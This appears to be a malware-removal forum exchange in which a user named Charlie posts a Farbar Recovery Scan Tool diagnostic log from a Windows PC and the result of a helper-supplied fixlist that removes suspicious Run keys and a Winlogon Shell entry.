Task: {818B6E4F-B131-4DE5-AA3E-03329037D6B4} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation)
Task: {82B3BF49-D8E5-44A0-99BB-744A644CF9B3} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2017-07-26] (AVG Technologies CZ, s.r.o.)
Task: {856C1A0B-D1FE-414A-877F-40CC1A262C0F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {92BE7943-78D8-4C4B-883D-3B2AAF434323} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {93A65F06-EFE4-4570-9760-03851C229F92} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} - System32\Tasks\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe"
Task: {9F33BB8D-EA5E-4178-A01D-049835D5EA82} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {A07E9AD8-DFAC-47D9-AB07-04E3E9CA4C84} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation)
Task: {A1231E6E-3113-41DF-B107-2905830BF645} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-10-11] (Microsoft Corporation)
Task: {A1D60D55-A6B8-401B-BC05-2938E02DF2F2} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => d:\program files\windows defender\MpCmdRun.exe
Task: {A32272C9-4C2E-40B3-9BC4-7837AAA94F46} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {B1450FE1-82E8-40F1-8F3F-5749E0F9E20E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B339B57F-52A4-44A2-B3C0-AFE7668D7751} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {B75CC161-8539-4321-B7B7-BDBBDC184FCC} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-05-29] ()
Task: {BA7F3875-7416-4EF5-B045-A03824D3AFA2} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C11D840D-C170-4F9B-8C68-0CFA8D3BFBF9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-10-25] (Adobe Systems Incorporated)
Task: {C1913C94-0842-490C-B755-F95332E09ABA} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C4E8B14A-4159-4C58-BDAD-281DBBFC97E8} - System32\Tasks\Microsoft\Windows Defender\MpIdleTask => d:\program files\windows defender\MpCmdRun.exe
Task: {C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} - \PCDoctorBackgroundMonitorTask -> No File <==== ATTENTION
Task: {CE4EEC05-AE50-4266-B124-7496745958B2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {D163B177-E9E5-43D7-B1DE-32EEFF81AA9A} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-04-22] (Dell Inc.)
Task: {DA5EBFDD-F0C4-44BB-802B-EC827B4A9BF5} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DA9D1E83-01AA-4187-BDB9-6D13247DE477} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DD892FCB-068E-4A07-AFA4-C8584CF611D9} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {FFD0BCF8-7926-4344-A2B0-908C275D350D} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Caret.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=fljalecfjciodhpcledpamjachpmelml
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Murder Files.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ijfecbiladpinddbjfodaaiahggomhaf
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Pixlr Touch Up.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=jklljiahjgoglchglekebfljnmbaleig
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Solitaire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=lkbhppfbabandkdmgjmifahoabeodiep
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sunrise Calendar.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=mojepfklcankkmikonjlnidiooanmpbb
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\WorkFlowy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=koegeopamaoljbmhnfjbclbocehhgmkm

==================== Loaded Modules (Whitelisted) ==============

2016-03-15 10:19 - 2017-11-10 06:37 - 008931496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2017-03-18 15:58 - 2017-03-18 15:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 15:59 - 2017-03-18 21:30 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:18750BD1 [145]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "DisplayName"="Dell"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ErrorControl"="1"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ImagePath"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ObjectName"="LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Start"="2"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Type"="272"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "Application"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "AppParameters"=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\localhost -> localhost

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2015-08-13 13:46 - 000000734 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Charlie\Pictures\lighthouse.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: RapportMgmtService => 2
MSCONFIG\Services: RtkAudioService => 2
MSCONFIG\Services: SftService => 2
MSCONFIG\Services: TuneUp.UtilitiesSvc => 2
HKLM\...\StartupApproved\StartupFolder: => "Install LastPass FF RunOnce.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Install LastPass IE RunOnce.lnk"
HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "CanonSolutionMenuEx"
HKLM\...\StartupApproved\Run32: => "DBAgent"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "USB3MON"
HKLM\...\StartupApproved\Run32: => "vProt"
HKLM\...\StartupApproved\Run32: => "Malwarebytes Anti-Exploit"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "GarminExpressTrayApp"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "Uploader"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{7CF0B69C-0DF4-4E8D-A6D0-6DF63D0B1078}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{9497CDF5-9603-4872-82A5-93316B585EE7}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D4EE236B-05CC-4705-ADEE-70E743A19AC5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{05FDCBFA-215A-4D4B-A73E-2AB2A29459BB}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{4D14B9BE-7542-4749-B117-E76E3718F94B}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{DD007F03-6CFB-4FF3-855D-77C1CAA586E4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{17259786-812F-437A-95AA-4348016A08BD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{A6A28A3D-5FEE-4082-BB98-15AC1C5B7D7D}] => (Allow) C:\Program Files (x86)\Laplink\PCmover\pcmover.exe
FirewallRules: [{AC7706D0-A3B5-47C1-B042-A8187C6E147A}] => (Allow) LPort=8888
FirewallRules: [{863F6857-0276-49C5-B1E5-CFC6C75E1D42}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{E1E8C3C4-1603-491E-9EE6-5D72E01B5238}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{52D8F604-C3D5-47E7-B367-10F9C7371B49}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{D226D9A4-6BA1-44B6-A9D6-D4BDE65858D9}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1548C2C5-D5F3-42F1-9CD0-CCB29B1F8A25}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{A20652DE-EB50-4341-9C75-4F87A50AB71B}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{C27B36A2-3295-4928-B9AF-8A70F1B245E5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{CB2E633C-B6CF-41FD-A0ED-2097BCC10CF8}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{97104FE1-B253-4B66-94B8-34C61639F706}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{4C7BD61A-FC97-4D74-BCE1-B3A03553E670}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{28D86D11-A19B-4C4C-8C72-E8D90A3AEF4F}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe

==================== Restore Points =========================

05-11-2017 16:29:34 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/10/2017 06:53:14 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (11/10/2017 06:32:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: esu.exe, version: 1.0.0.0, time stamp: 0x58dac8d5
Faulting module name: KERNELBASE.dll, version: 10.0.15063.674, time stamp: 0x6d16dd24
Exception code: 0xe0434352
Fault offset: 0x000eb872
Faulting process id: 0x47bc
Faulting application start time: 0x01d35a16b6f0a3c9
Faulting application path: C:\Program Files (x86)\Garmin\Express SelfUpdater\esu.exe
Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll
Report Id: b656c1f8-1500-4bab-a1c5-1476cbf7d52d
Faulting package full name:
Faulting package-relative application ID:

Error: (11/10/2017 06:32:00 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: esu.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.FileNotFoundException
   at Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61.MoveNext()
   at System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Start[[Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61, ExpressSelfUpdater, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null]](<UpdateDatacenterOverridesAsync>d__61 ByRef)
   at Garmin.Omt.Service.Shared.Overrides.UpdateDatacenterOverridesAsync(Boolean)
   at Garmin.Omt.Service.Shared.Overrides..cctor()

Exception Info: System.TypeInitializationException
   at Garmin.Omt.Service.Shared.Overrides.get_OmtBaseUrl()
   at Garmin.Omt.Express.SelfUpdater.Program.RealMain()
   at Garmin.Omt.Express.SelfUpdater.Program.Main(System.String[])

Error: (11/10/2017 06:21:56 AM) (Source: COM) (EventID: 10031) (User: )
Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected

Error: (11/09/2017 09:18:00 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "aspnet_state" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

Error: (11/09/2017 09:17:59 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET_4.0.30319" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

Error: (11/09/2017 09:17:59 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ASP.NET" in DLL "C:\Windows\System32\aspnet_counters.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

Error: (11/09/2017 09:17:59 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service ".NETFramework" in DLL "C:\WINDOWS\system32\mscoree.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

Error: (11/09/2017 06:24:58 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (11/09/2017 04:01:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: esu.exe, version: 1.0.0.0, time stamp: 0x58dac8d5
Faulting module name: KERNELBASE.dll, version: 10.0.15063.674, time stamp: 0x6d16dd24
Exception code: 0xe0434352
Fault offset: 0x000eb872
Faulting process id: 0x3ec8
Faulting application start time: 0x01d3593962b899dd
Faulting application path: C:\Program Files (x86)\Garmin\Express SelfUpdater\esu.exe
Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll
Report Id: 511a3a4c-a029-49df-ab08-3ec49f2fbd34
Faulting package full name:
Faulting package-relative application ID:


System errors:
=============
Error: (11/10/2017 04:17:56 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service EventSystem with arguments "Unavailable" in order to run the server:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (11/10/2017 04:17:46 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/10/2017 04:16:22 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/10/2017 04:16:22 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/10/2017 04:16:18 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/10/2017 04:16:18 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/10/2017 04:16:18 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/10/2017 04:15:20 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/10/2017 04:15:20 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/10/2017 04:15:20 PM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}


CodeIntegrity:
===================================
  Date: 2017-11-10 16:13:01.346
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-11-04 08:01:02.085
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-30 14:59:34.980
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-30 00:33:27.890
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-25 14:37:10.029
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-13 17:40:05.033
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-06 12:40:27.330
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-06 12:35:32.027
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-06 12:22:27.398
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-01 19:06:23.678
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Percentage of memory in use: 19%
Total physical RAM: 8108.94 MB
Available physical RAM: 6515.47 MB
Total Virtual: 16300.94 MB
Available Virtual: 15084.72 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:919.74 GB) (Free:802.87 GB) NTFS
Drive e: () (Removable) (Total:15.02 GB) (Free:15.02 GB) FAT32
Drive f: (Seagate Slim Drive) (Fixed) (Total:465.76 GB) (Free:454.05 GB) NTFS
Drive g: (KINGSTON) (Removable) (Total:14.89 GB) (Free:13.24 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 931.5 GB) (Disk ID: 5641807B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=11.7 GB) - (Type=27)
Partition 3: (Not Active) - (Size=919.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: 19D43B3F)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 14.9 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=14.9 GB) - (Type=0C)
 Could not read MBR for disk 3.

==================== End of Addition.txt ============================


Alright, follow the instructions below.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.

  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located)
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Fix button
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad
  • Copy and paste its content in your next reply

fixlist.txt


Yoan, I followed all the steps, and still get the same popups.  See log below:

Fix result of Farbar Recovery Scan Tool (x64) Version: 12-11-2017 03
Ran by Charlie (12-11-2017 17:02:58) Run:1
Running from C:\Users\Charlie\Desktop
Loaded Profiles: Charlie (Available Profiles: Charlie)
Boot Mode: Safe Mode (with Networking)
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:

HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Svebx<*>] => "C:\Users\Charlie\AppData\Local\Asjam\rursu.vfimyrtu" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Qsewipofto<*>] => "C:\Users\Charlie\AppData\Local\Uxuve\l vac.lnk" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Winlogon: [Shell] - <==== ATTENTION
GroupPolicy: Restriction <==== ATTENTION

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION

